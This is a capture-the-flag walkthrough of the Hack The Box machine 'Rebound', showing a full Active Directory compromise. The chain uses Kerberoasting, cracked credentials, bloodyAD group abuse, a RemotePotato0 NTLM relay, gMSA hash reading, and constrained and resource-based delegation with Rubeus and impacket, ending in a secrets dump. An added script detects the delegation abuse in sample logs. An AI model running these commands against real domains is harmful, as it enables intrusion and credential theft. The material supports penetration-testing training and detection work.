
# Rebound - HTB

![](/files/3VY3m6QMsdsU4wuFaBfe)

## Foothold

Enumerating existing users

<figure><img src="/files/VOX7XwDXTGob3I7px9Yu" alt=""><figcaption></figcaption></figure>

Using GetUserSPNs to request service tickets via the no-preauth user jjones

<figure><img src="/files/DDEEdNOm5FMbj6q6pdxt" alt=""><figcaption></figcaption></figure>

The ldap\_monitor user's hash was cracked

<figure><img src="/files/FXyoFho9rAn2V3PvPxXY" alt=""><figcaption></figcaption></figure>

```
ldap_monitor:1GR8t@$$4u
```

The machine returns the error **`KRB_AP_ERR_SKEW(Clock skew too great)`**

After some googling I found this:

<figure><img src="/files/oe8zYuOmxTrd6qrtwGsz" alt=""><figcaption></figcaption></figure>

Synchronize the local clock with the domain controller's time, since Kerberos is time sensitive.

Creating a TGT

<figure><img src="/files/i7zwGVHHc1BjkGYqfpZe" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BmiteSuWnZrGfSHqmxaU" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NKW0SyAcwPVOiljtehth" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/D5k3q0Y0PGEEsMCmxAFy" alt=""><figcaption></figcaption></figure>

After reviewing BloodHound:

1- Add the 'oorend' user to the ServiceMgmt group

```
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
```

2- Get FullControl on the Service Users OU

```
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
```

3- Update the winrm\_svc password

```
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Ask1askaskask
```

or, with rpcclient:

```
setuserinfo2 winrm_svc 23 Ask1askaskask
```

<figure><img src="/files/BM9qRM9vild1bfJNhlsz" alt=""><figcaption></figcaption></figure>

## Root

First we need the user tbrady.

Exploit: RPC -> LDAP relay

<https://github.com/antonioCoco/RemotePotato0>

It abuses the DCOM activation service and triggers an NTLM authentication of any user currently logged on to the target machine. It is required that a privileged user is logged on to the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered, we set up a cross-protocol relay server that receives the privileged type1 message and relays it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows you to grab and steal NTLMv2 hashes of every user logged on to a machine.

So this is what to do:

1- Set up a socat listener

`socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999`

2- Set up a cross-protocol relay server with ntlmrelayx

`python3 ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc`

3- Execute RemotePotato.exe

`.\RemotePotato.exe -m 2 -s 1 -r 10.10.14.15 -x 10.10.14.15 -p 9999`

<figure><img src="/files/frcfm7Jxk2iDuVhEjW5s" alt=""><figcaption></figcaption></figure>

Cracked the captured hash with hashcat -m 5600:

`tbrady : 543BOMBOMBUNmanda`

We can't get a shell with this user, but we can still use bloodyAD.

The user tbrady can read the gMSA password of the delegator$ gMSA.

The delegator gMSA has constrained delegation configured over the DC.

<figure><img src="/files/YpOyWvaXFzipOoddPZ6f" alt=""><figcaption></figcaption></figure>

The recovered hash (LM:NT):

`aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3`

Getting a TGT for ***delegator$***

<figure><img src="/files/hGZSYqrUM3TLD5TvfsfG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/r9K4hZToGXAt1lmYveMB" alt=""><figcaption></figcaption></figure>

Uploading RunasCs.exe:

```
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "cmd.exe /c whoami"
```

We are able to execute commands as the user tbrady, so let's upload a reverse shell and grant permissions on the folder:

```
icacls "C:\Users\winrm_svc\Documents" /grant:r "Everyone:(OI)(CI)F" /T
```

```
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\Users\winrm_svc\Documents\shell.exe"
```

Now, from the tbrady shell, we execute Rubeus to impersonate the administrator and obtain a ticket:

```
.\Rubeus.exe s4u /user:delegator$ /aes256:9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b /domain:rebound.htb /impersonateuser:administrator /nowrap /ptt
```

The ticket is not yet imported, so we copy the \<base64> blob and pass it to another command to import it:

```
.\Rubeus.exe ptt /ticket:<base64 ticket .........asdgb==>
```

Administrator TGT imported

<figure><img src="/files/4PVPlo6Da0jCTR41bJT2" alt=""><figcaption></figcaption></figure>

We can take the base64 ticket, decode it and convert it so it can be imported locally:

<figure><img src="/files/wIuuPVm6HFb5FwIBdI8B" alt=""><figcaption></figcaption></figure>

Found out that /etc/hosts must contain:

```
10.10.11.231 dc01.rebound.htb dc01
```

Configuring resource-based constrained delegation from the 'ldap\_monitor' service principal to the 'delegator$' service principal over LDAPS:

```
python3 rbcd.py -aesKey 9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -debug -action write -delegate-from ldap_monitor
```

Get a TGT for ldap\_monitor.

Now impersonate dc01$:

```
python3 getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
```

Export the new ticket and use it to dump the Administrator's secrets:

```
python3 secretsdump.py -no-pass -k dc01.rebound.htb -just-dc-user administrator
```
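Added defender-side example, not code from the original write-up: the RBCD write and the S4U2Proxy impersonation performed above both leave records in the DC's Security log (Event 5136 on `msDS-AllowedToActOnBehalfOfOtherIdentity`, and Event 4769 with a populated TransitedServices field). The script below scans constructed sample event records for those two traces; the `SENSITIVE` account list is an assumption to tune per environment.

```python
"""Flags the two server-side traces of the delegation chain above in parsed
Security events: the RBCD write (Event 5136) and the S4U2Proxy ticket request
(Event 4769 with a populated TransitedServices field). Event records are
constructed samples, not real logs."""
from typing import Iterable, List, Optional

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
# Accounts whose impersonation should always be reviewed (assumption: tune per environment).
SENSITIVE = {"administrator", "dc01$"}


def flag_event(ev: dict) -> Optional[str]:
    """Return an alert string for a suspicious event, or None."""
    eid = ev.get("EventID")
    if eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
        # Any write to this attribute grants another principal delegation rights
        # on the object; legitimate writes are rare and should be change-managed.
        return f"RBCD write on {ev['ObjectDN']} by {ev['SubjectUserName']}"
    # Windows logs "-" rather than an empty string when no service was transited.
    transited = ev.get("TransitedServices", "-")
    if eid == 4769 and transited not in ("", "-"):
        # TransitedServices is populated only for S4U2Proxy requests, i.e. a
        # service account obtained a ticket on behalf of another user.
        user = ev.get("TargetUserName", "").split("@")[0].lower()
        if user in SENSITIVE:
            return f"S4U2Proxy: {transited} impersonated {user} to {ev['ServiceName']}"
    return None


def scan(events: Iterable[dict]) -> List[str]:
    """Run flag_event over a stream of parsed event records."""
    return [alert for alert in map(flag_event, events) if alert]


SAMPLE_EVENTS = [  # constructed sample records
    {"EventID": 4769, "TargetUserName": "jjones@REBOUND.HTB",
     "ServiceName": "cifs/dc01.rebound.htb", "TransitedServices": "-"},
    {"EventID": 5136, "SubjectUserName": "delegator$", "AttributeLDAPDisplayName": RBCD_ATTR,
     "ObjectDN": "CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "tbrady", "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=tbrady,CN=Users,DC=rebound,DC=htb"},
    {"EventID": 4769, "TargetUserName": "administrator@REBOUND.HTB",
     "ServiceName": "http/dc01.rebound.htb", "TransitedServices": "delegator$@REBOUND.HTB"},
    {"EventID": 4769, "TargetUserName": "dc01$@REBOUND.HTB",
     "ServiceName": "browser/dc01.rebound.htb", "TransitedServices": "ldap_monitor@REBOUND.HTB"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

The normal TGS request and the unrelated attribute write are left alone; only the three delegation-abuse records are reported.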

<figure><img src="/files/xCEtd53wEWdfUJ08TeTB" alt=""><figcaption></figcaption></figure>
